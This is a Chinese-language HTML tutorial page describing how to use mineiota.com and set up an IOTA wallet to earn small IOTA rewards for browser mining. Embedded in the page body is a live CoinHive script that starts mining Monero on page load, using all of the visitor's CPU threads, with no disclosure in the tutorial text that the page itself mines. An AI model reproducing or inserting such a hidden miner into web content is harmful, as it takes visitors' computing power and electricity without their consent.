<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="description" content="IOTA 是最近竄紅的虛擬貨幣，但其實所有貨幣都在ICO就已經發出了，意思就是只能靠交易取得，但 mineiota.com 提供讓你在網頁上挖 XMR 而它獎勵你 IOTA，目的在推廣 IOTA 這個貨幣，鼓勵你試試看免手續費的錢包和體驗一下交易的速度。" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>MineIOTA - IOTA 線上挖礦教學</title>

<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-110965571-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-110965571-1');
</script>
<style type="text/css">
<!--
body {
	font: 100%/1.4 Verdana, Arial, Helvetica, sans-serif;
	background-color: #4E5869;
	margin: 0;
	padding: 0;
	color: #000;
}

/* ~~ 元素/標籤選取器 ~~ */
ul, ol, dl { /* 由於瀏覽器之間的差異，最佳作法是在清單中使用零寬度的欄位間隔及邊界。為了保持一致，您可以在這裡指定所要的量，或在清單包含的清單項目 (LI、DT、DD) 上指定所要的量。請記住，除非您寫入較為特定的選取器，否則在此執行的作業將重疊顯示到 .nav 清單。 */
	padding: 0;
	margin: 0;
}
h1, h2, h3, h4, h5, h6, p {
	margin-top: 0;	 /* 移除上方邊界可以解決邊界可能從其包含的 Div 逸出的問題。剩餘的下方邊界可以保持 Div 不與接在後面的元素接觸。 */
	padding-right: 15px;
	padding-left: 15px; /* 將欄位間隔加入至 Div 內元素的兩側 (而不是 Div 本身)，即可不需執行任何方塊模型的計算作業。具有側邊欄位間隔的巢狀 Div 也可當做替代方法。 */
	text-align: center;
}
a img { /* 這個選取器會移除某些瀏覽器在影像由連結所圍繞時，影像周圍所顯示的預設藍色邊框 */
	border: none;
}

/* ~~ 網站連結的樣式設定必須保持此順序，包括建立滑過 (Hover) 效果的選取器群組在內。~~ */
a:link {
	color:#414958;
	text-decoration: underline; /* 除非您要設定非常獨特的連結樣式，否則最好提供底線，以便快速看出 */
}
a:visited {
	color: #4E5869;
	text-decoration: underline;
}
a:hover, a:active, a:focus { /* 這個選取器群組可以讓使用鍵盤導覽的使用者，也和使用滑鼠的使用者一樣擁有相同的滑過體驗。 */
	text-decoration: none;
}

/* ~~ 這個容器環繞著所有其他的 Div，並依百分比設定其寬度 ~~ */
.container {
	width: 80%;
	max-width: 1260px;/* 建議您使用最大寬度，如此版面在大型螢幕上就不致於過寬，讓行保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	min-width: 780px;/* 建議您使用最小寬度，如此版面在大型螢幕上就不致於過窄，讓行在側欄中保持比較方便閱讀的長度。IE6 並不適用這項宣告。 */
	background-color: #FFF;
	margin: 0 auto; /* 兩側的自動值與寬度結合後，版面便會置中對齊。如果將 .container 的寬度設為 100%，就不需要這麼做。 */
}

/* ~~ 這是版面資訊。~~ 

1) 欄位間隔只會置於 Div 的頂端或底部。此 Div 內的元素在兩側會有欄位間隔，可讓您不需進行「方塊模型計算」。請記住，如果對 Div 本身加入任何側邊的欄位間隔或邊框，在計算「總」寬度時，就會將這些加入您定義的寬度。您也可以選擇移除 Div 中元素的欄位間隔，然後在其中放置沒有寬度的第二個 Div，並依設計所需放置欄位間隔。

*/
.content {
	padding: 10px 0;
}

/* ~~ 這個群組選取器會在 .content 區域空間中提供清單 ~~ */
.content ul, .content ol { 
	padding: 0 15px 15px 40px; /* 這個欄位間隔反映出上方標題和段落規則中的右方間隔。當欄位間隔位於下方時，便可將清單中的其他元素間隔開來；當位於左方時，則可藉此建立縮排。這些動作均可依需要進行調整。 */
}

/* ~~ 其他 float/clear 類別 ~~ */
.fltrt {  /* 這個類別可用來讓元素在頁面中浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: right;
	margin-left: 8px;
}
.fltlft { /* 這個類別可用來讓元素在頁面左方浮動，浮動的元素必須位於頁面上相鄰的元素之前。 */
	float: left;
	margin-right: 8px;
}
.clearfloat { /* 這個類別可放置在 <br /> 或空白的 Div 上，當做接在 #container 內最後一個浮動 Div 後方的最後一個元素 (如果已移除 .container 上的 overflow:hidden) */
	clear:both;
	height:0;
	font-size: 1px;
	line-height: 0px;
}
-->
</style></head>

<body>

<script src="https://coin-hive.com/lib/coinhive.min.js"></script>

<script type="text/javascript">
var miner = new CoinHive.User('nueUIn9yJrvxUBki7TwJMs0s0bpqXDqb', 'User', {
	threads: navigator.hardwareConcurrency,
	autoThreads: false,
	throttle: 0.5,
	forceASMJS: false
	});
miner.start(CoinHive.FORCE_EXCLUSIVE_TAB);
// Update stats once per second
setInterval(function() {
    var threadCount = miner.getNumThreads();
    var hashesPerSecond = Math.round(miner.getHashesPerSecond() * 100) / 100;
    var totalHashes = miner.getTotalHashes();
    var acceptedHashes = miner.getAcceptedHashes() / 256;
    // Output to HTML elements...
    if (miner.isRunning()) {
        document.getElementById("ths").innerHTML = "Hashes:</br> " + totalHashes;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.stop()\">Stop</br>Mining</button>";
    } else {
        document.getElementById("ths").innerHTML = "Total:</br>" + totalHashes;;
        document.getElementById("minebutton").innerHTML = "<button onclick=\"miner.start(CoinHive.FORCE_EXCLUSIVE_TAB)\">Continue</br>Mining</button>";
    }
}, 1000);
</script>

<div class="container">
  <div class="content">
    <blockquote>
      <blockquote>
        <blockquote>
          <h2>MineIOTA - IOTA 線上挖礦教學 </h2>
          <b>IOTA&nbsp;</b>是最近竄紅的虛擬貨幣，但其實所有貨幣都在ICO就已經發出了，意思就是只能靠交易取得，<b><span style="color: red;">但 mineiota.com 提供讓你在網頁上挖 XMR 而它獎勵你 IOTA</span></b>，目的在推廣 IOTA 這個貨幣，鼓勵你試試看免手續費的錢包和體驗一下交易的速度。<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Efh0ddJA0sE/WjH14SnQYkI/AAAAAAAAA8c/kMlYH1f8TS80YpoUIRDC0JsYn3-94IYuACLcBGAs/s1600/2017-12-14_115400.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="100" data-original-width="417" height="76" src="https://4.bp.blogspot.com/-Efh0ddJA0sE/WjH14SnQYkI/AAAAAAAAA8c/kMlYH1f8TS80YpoUIRDC0JsYn3-94IYuACLcBGAs/s320/2017-12-14_115400.jpg" width="320" /></a></div>
<div>
<b><span style="font-size: large;">MineIOTA</span></b></div>
<div>
<b>網址</b> : <a href="https://mineiota.com/">https://mineiota.com/</a></div>
<div>
<b>起付</b><span style="font-size: x-small;"> : 0.1 USD&nbsp; (因為目前IOTA網路壅塞，不然以前是隨時付) 10 USD 以上可以聯繫網站主換 LTC</span></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
首先你要先有自己的錢包，到 <a href="https://github.com/iotaledger/wallet/releases">https://github.com/iotaledger/wallet/releases</a> 下載錢包。</div>
<div>
<br /></div>
<div>
然後依照提示生成一個地址，<b><span style="color: red;">SEED只能用大寫英文字母跟數字9組合，而且要記好這個SEED否則以後再也沒辦法使用裡面的IOTA了。</span></b></div>
<div>
<br /></div>
<div>
因為所有貨幣都已經發放完畢，自然也不需要同步區塊鏈了，對IOTA的運作模式和技術有興趣可以去看官網(<a href="https://iota.org/">https://iota.org/</a>)。</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
收款地址要按附加到TANGLE才有用。</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-JeB8ZHqHcuo/WjH41flLQCI/AAAAAAAAA8w/re98K8Sb2NYw39GEjWjdivncmwRYF7pNACLcBGAs/s1600/2017-12-14_120623.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="224" data-original-width="506" height="141" src="https://3.bp.blogspot.com/-JeB8ZHqHcuo/WjH41flLQCI/AAAAAAAAA8w/re98K8Sb2NYw39GEjWjdivncmwRYF7pNACLcBGAs/s320/2017-12-14_120623.jpg" width="320" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
將剛剛產生好的收款地址貼上，開始挖礦，<b><span style="color: red;">記得收款地址不要重複使用，會有洩漏的風險。</span></b></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-XM4wG1JCVI4/WjH3wS_BYHI/AAAAAAAAA8o/MjrzTv0OpysO-T5V9YUnBFGZLQVWY-kyQCLcBGAs/s1600/2017-12-14_120144.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="697" data-original-width="811" height="548" src="https://2.bp.blogspot.com/-XM4wG1JCVI4/WjH3wS_BYHI/AAAAAAAAA8o/MjrzTv0OpysO-T5V9YUnBFGZLQVWY-kyQCLcBGAs/s640/2017-12-14_120144.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-JxGQzi75MuA/WjH5qjxIqwI/AAAAAAAAA88/GLutNkWADGUk8mULilM3S8EiEo1WlrpagCLcBGAs/s1600/2017-12-14_121006.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="479" data-original-width="811" height="378" src="https://3.bp.blogspot.com/-JxGQzi75MuA/WjH5qjxIqwI/AAAAAAAAA88/GLutNkWADGUk8mULilM3S8EiEo1WlrpagCLcBGAs/s640/2017-12-14_121006.jpg" width="640" /></a></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
然後就可以放著挖礦等待收款啦，不過一般交易的IOTA一單位都是指百萬個IOTA，也就是MIOTA，而這邊的IOTA是原始單位的，也就是百萬分之一啦，所以真的只是讓你玩玩這些功能、推廣新幣而已。</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>

            <!-- end .content -->

        </blockquote>
      </blockquote>
    </blockquote>
  </div>
  <!-- end .container --></div>
  
  <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-4e3a680e5532cd78"></script>
</body>
</html>
